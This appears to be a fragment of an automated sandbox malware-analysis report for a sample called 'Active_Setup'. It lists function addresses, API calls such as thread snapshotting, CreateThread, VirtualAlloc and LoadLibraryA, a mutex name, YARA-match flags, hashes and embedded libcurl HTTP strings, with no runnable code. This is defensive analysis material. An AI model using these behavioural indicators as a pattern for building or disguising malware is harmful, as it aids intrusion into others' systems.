                                                                                                                                                  • API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1849706056-0
                                                                                                                                                  • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                  • Instruction ID: 9254b1df37b8ce6cedb12fd73ea3417ca6bcc02da151e3874174235921068232
                                                                                                                                                  • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                  • Instruction Fuzzy Hash: 8C41ED75A00209AFDB18DF98C494FADB7F6EFC8300F10C169E6159B794DA34AE45CB94
                                                                                                                                                  Function 00940879 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103threadCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 2607 940879-9408d0 GetPEB 2608 9408db-9408df 2607->2608 2609 9408e5-9408f0 2608->2609 2610 94097f-940986 2608->2610 2612 9408f6-94090d 2609->2612 2613 94097a 2609->2613 2611 940991-940995 2610->2611 2615 9409a6-9409ad 2611->2615 2616 940997-9409a4 2611->2616 2617 940932-94094a CreateThread 2612->2617 2618 94090f-940930 2612->2618 2613->2608 2621 9409b6-9409bb 2615->2621 2622 9409af-9409b1 2615->2622 2616->2611 2619 94094e-940956 2617->2619 2618->2619 2619->2613 2623 940958-940975 2619->2623 2622->2621 2623->2613
                                                                                                                                                  APIs
                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00940945
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_940000_Active_Setup.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                  • String ID: ,
                                                                                                                                                  • API String ID: 2422867632-3772416878
                                                                                                                                                  • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                  • Instruction ID: 10a8b2802acc4ce8528046edd39b15237a743a40f01df353e7c06eb4b5abdf5a
                                                                                                                                                  • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                  • Instruction Fuzzy Hash: 1841C274A00209EFDB14CF98C994BAEB7B1BF88314F208698D515AB391C775AE81DF94
                                                                                                                                                  Function 00FB7290 Relevance: 1.6, APIs: 1, Instructions: 370memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAlloc.KERNEL32(-0000000246944B8E,0004FC08,?,?,?,?,?,-88E75856,?,?,00FB186C,?), ref: 00FB74B0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: 87618e3beb5da5f86094ee3286f14d171b0cf1d8750964c458981a0e2a5cd054
                                                                                                                                                  • Instruction ID: 1fad810b7222c35f5c5405f25137a504feb6f9e44f79f7a782fd93f91196f738
                                                                                                                                                  • Opcode Fuzzy Hash: 87618e3beb5da5f86094ee3286f14d171b0cf1d8750964c458981a0e2a5cd054
                                                                                                                                                  • Instruction Fuzzy Hash: 40D12276D003258FC768EFB5EC8B16A3762FB90304785862ED4C29794DDB3F55468B82
                                                                                                                                                  Function 00FB7360 Relevance: 1.6, APIs: 1, Instructions: 330memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAlloc.KERNEL32(-0000000246944B8E,0004FC08,?,?,?,?,?,-88E75856,?,?,00FB186C,?), ref: 00FB74B0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: 5b4a4d5d2de60def9871a2dc073e6b9a2df40ba55426148c46e30db70b473942
                                                                                                                                                  • Instruction ID: 0824cdd0a63ff38d23e4e530f3d177fd54194c797765d3f8d6542dd41d32927f
                                                                                                                                                  • Opcode Fuzzy Hash: 5b4a4d5d2de60def9871a2dc073e6b9a2df40ba55426148c46e30db70b473942
                                                                                                                                                  • Instruction Fuzzy Hash: FAB133769003258FC764EFB9FC8B16A3762FB90304789462ED4C287A4DDB3F55468B86
                                                                                                                                                  Function 00FB7440 Relevance: 1.4, APIs: 1, Instructions: 180memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAlloc.KERNEL32(-0000000246944B8E,0004FC08,?,?,?,?,?,-88E75856,?,?,00FB186C,?), ref: 00FB74B0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: b9bca80428ef077cbc548b993cc6f02218c735e15059e5894aec5546a2bbef7b
                                                                                                                                                  • Instruction ID: 591b7d819ca619db6ebbde74997f6281c73cfb51e9bfe3a6cd6ae66e47201a1d
                                                                                                                                                  • Opcode Fuzzy Hash: b9bca80428ef077cbc548b993cc6f02218c735e15059e5894aec5546a2bbef7b
                                                                                                                                                  • Instruction Fuzzy Hash: 9651DFB69003258FC768EFB9FC8716A3662BB91304389922ED5C28794DDF3F51458B86
                                                                                                                                                  Function 00FB7540 Relevance: .2, Instructions: 209COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 1e5d6f44d00092defcea7113a54adfb284d6ae16bb88fc5a32ee7521e6e081e2
                                                                                                                                                  • Instruction ID: 1a9c3f559512f8c19f6e55c321d369cb06b61776eba793fc9e17f46853d4a60a
                                                                                                                                                  • Opcode Fuzzy Hash: 1e5d6f44d00092defcea7113a54adfb284d6ae16bb88fc5a32ee7521e6e081e2
                                                                                                                                                  • Instruction Fuzzy Hash: 8B6165768003248FC764EF79EC8B1AA3761FB90314745522ED9C28BA0DDB3F554A8BC6
                                                                                                                                                  Function 00FB7660 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7ff982de4d974110e1e73dbb3b302de19d6c99b28f3638df10deb8efb5a09690
                                                                                                                                                  • Instruction ID: 7e5e953311e0e5db1abd856f04d5e5668206159dadafdc22c92f1f4601e58605
                                                                                                                                                  • Opcode Fuzzy Hash: 7ff982de4d974110e1e73dbb3b302de19d6c99b28f3638df10deb8efb5a09690
                                                                                                                                                  • Instruction Fuzzy Hash: 4941797B8043244FC760EF79EC8A2A63761BFD1314B85562DD8C28B609DB3F544A8BC6
                                                                                                                                                  Function 0109E370 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 2604 109e370-109e39c CreateMutexW GetLastError call 1080748 2606 109e3a1-109e3a2 2604->2606
                                                                                                                                                  APIs
                                                                                                                                                  • CreateMutexW.KERNEL32(00000000,00000000,Global\EUDLOG_LOG_H_XXX_), ref: 0109E379
                                                                                                                                                  • GetLastError.KERNEL32 ref: 0109E384
                                                                                                                                                  Strings
                                                                                                                                                  • Global\EUDLOG_LOG_H_XXX_, xrefs: 0109E370
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateErrorLastMutex
                                                                                                                                                  • String ID: Global\EUDLOG_LOG_H_XXX_
                                                                                                                                                  • API String ID: 1925916568-695966051
                                                                                                                                                  • Opcode ID: 88ab23e106b1ecdc887b5fdd706753d5730cdb0d500ec535e9ef9e9b9cb7f12e
                                                                                                                                                  • Instruction ID: b5c3d694e2e1432d6b488bcf40eaa8597e46285fde1e10fa7cc9288f9e3e2564
                                                                                                                                                  • Opcode Fuzzy Hash: 88ab23e106b1ecdc887b5fdd706753d5730cdb0d500ec535e9ef9e9b9cb7f12e
                                                                                                                                                  • Instruction Fuzzy Hash: 5CD0A9309883009ADB242771B80E7093E907BD0A02F108808F5C9D8C89CBAD00284B00
                                                                                                                                                  Function 0098F4F7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66libraryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 2626 98f4f7-98f50a 2627 98f50c-98f50f 2626->2627 2628 98f522-98f52c 2626->2628 2629 98f511-98f514 2627->2629 2630 98f53b-98f547 2628->2630 2631 98f52e-98f536 2628->2631 2629->2628 2633 98f516-98f520 2629->2633 2632 98f54a-98f54f 2630->2632 2631->2630 2634 98f551-98f55c 2632->2634 2635 98f582-98f589 LoadLibraryA 2632->2635 2633->2628 2633->2629 2636 98f578-98f57c 2634->2636 2637 98f55e-98f576 call 98fbc5 2634->2637 2638 98f58c-98f590 2635->2638 2636->2632 2640 98f57e-98f580 2636->2640 2637->2636 2642 98f591-98f593 2637->2642 2640->2635 2640->2638 2642->2638
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNEL32(00000000,?,?), ref: 0098F589
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_940000_Active_Setup.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                  • String ID: .dll
                                                                                                                                                  • API String ID: 1029625771-2738580789
                                                                                                                                                  • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                  • Instruction ID: 3eb32ef8cbf17067808e0bf9f44fef0784ff9c571ce257850f657f07716492a2
                                                                                                                                                  • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                  • Instruction Fuzzy Hash: 622129766002859FEB21EF6CD894B7A7BA8BF05320F18517DE842CBB41D730EC458B90
                                                                                                                                                  Function 0109E3B0 Relevance: 3.0, APIs: 2, Instructions: 13synchronizationCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 2643 109e3b0-109e3d9 CreateMutexW GetLastError call 1080748 2645 109e3de-109e3df 2643->2645
                                                                                                                                                  APIs
                                                                                                                                                  • CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 0109E3B6
                                                                                                                                                  • GetLastError.KERNEL32 ref: 0109E3C1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateErrorLastMutex
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1925916568-0
                                                                                                                                                  • Opcode ID: 2285ed173ec3377dbe3f831fd2f707355c3b10832c8a8bb62f67a9ff94c0e9f3
                                                                                                                                                  • Instruction ID: b7f1182762a66239ab74621c64110ae34b698dd3b55352433d42f0fa9da658b1
                                                                                                                                                  • Opcode Fuzzy Hash: 2285ed173ec3377dbe3f831fd2f707355c3b10832c8a8bb62f67a9ff94c0e9f3
                                                                                                                                                  • Instruction Fuzzy Hash: C3D02230589300D6EB202730A80F7083E9477C0711F200408F6CDC88C8CA6D01984745
                                                                                                                                                  Function 0098E149 Relevance: 2.8, APIs: 2, Instructions: 325memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0098E1C3
                                                                                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 0098E507
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_940000_Active_Setup.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Virtual$AllocFree
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2087232378-0
                                                                                                                                                  • Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                                  • Instruction ID: ceff99b069523a280b121bd51ec9372e84b259d387754d6b7d0862d00be6cfb9
                                                                                                                                                  • Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                                  • Instruction Fuzzy Hash: ABB1C332500B06EBDB21BE70CCA4BA7B7ACFF49310F140929F95992361E735E950DBA1
                                                                                                                                                  Function 0108B845 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0108B85A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 10892065-0
                                                                                                                                                  • Opcode ID: fa0ab535a0ba9b7aebcde72b045384edf47ed36bdde4be5095b3e3398d63f5d3
                                                                                                                                                  • Instruction ID: 14c58c4dad881aedb1ccbae243236da1e31e581cd118b9644cb4e0ca828ef997
                                                                                                                                                  • Opcode Fuzzy Hash: fa0ab535a0ba9b7aebcde72b045384edf47ed36bdde4be5095b3e3398d63f5d3
                                                                                                                                                  • Instruction Fuzzy Hash: E2D05E725A47459EDB209E75A80A7373BDCD384A95F10447AB88CC6594E97AC581C640

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 00FCC100 Relevance: 108.5, APIs: 9, Strings: 52, Instructions: 1740COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • curl_maprintf.ACTIVE_SETUP(Referer: %s,?), ref: 00FCC31A
                                                                                                                                                  • curl_maprintf.ACTIVE_SETUP(Accept-Encoding: %s,?), ref: 00FCC3AE
                                                                                                                                                    • Part of subcall function 00FC1180: curl_mvsnprintf.ACTIVE_SETUP(00FB8A4C,00004000,tP8g,tP8g,tP8g,00000000,00FC9C63,tP8g,Callback aborted), ref: 00FC119C
                                                                                                                                                    • Part of subcall function 00FC1180: curl_msnprintf.ACTIVE_SETUP(8904C483,00000100,0109FC00,00FB8A4C), ref: 00FC11C3
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: curl_maprintf$curl_msnprintfcurl_mvsnprintf
                                                                                                                                                  • String ID: %s $%s HTTP/%s%s%s%s%s%s%s%s%s%s%s%s$%s%s$%s%s=%s$%x$0$100-continue$;type=$;type=%c$Accept-Encoding:$Accept-Encoding: %s$Accept:$Chunky upload is not supported by HTTP 1.0$Content-Length:$Content-Length: %lld$Content-Length: 0$Content-Range:$Content-Range: bytes %s%lld/%lld$Content-Range: bytes %s/%lld$Content-Range: bytes 0-%lld/%lld$Content-Type:$Content-Type: application/x-www-form-urlencoded$Cookie:$Cookie: $Could not get Content-Type header line!$Could not seek stream$Could only read %lld bytes from the input$Expect:$Failed sending HTTP POST request$Failed sending HTTP request$Failed sending POST request$Failed sending PUT request$File already completely uploaded$GET$HEAD$Host:$Host: %s%s%s$Host: %s%s%s:%hu$Internal HTTP POST error!$POST$PUT$Proxy-Connection:$Range:$Range: bytes=%s$Referer:$Referer: %s$Transfer-Encoding:$User-Agent:$chunked$ftp://$ftp://%s:%s@%s$upload completely sent off: %lld out of %lld bytes
                                                                                                                                                  • API String ID: 2113644472-3410303182
                                                                                                                                                  • Opcode ID: 5cc662320fb1889ba3c38ff6493382dd66995382d860dcf2b4ff6ea376d8f970
